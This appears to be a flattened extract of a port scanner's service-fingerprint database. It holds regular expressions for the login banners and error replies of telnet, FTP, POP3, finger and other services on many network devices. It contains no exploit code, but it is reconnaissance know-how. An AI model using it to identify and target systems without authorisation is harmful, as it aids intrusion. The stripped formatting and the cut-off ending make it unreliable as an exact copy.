+\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD 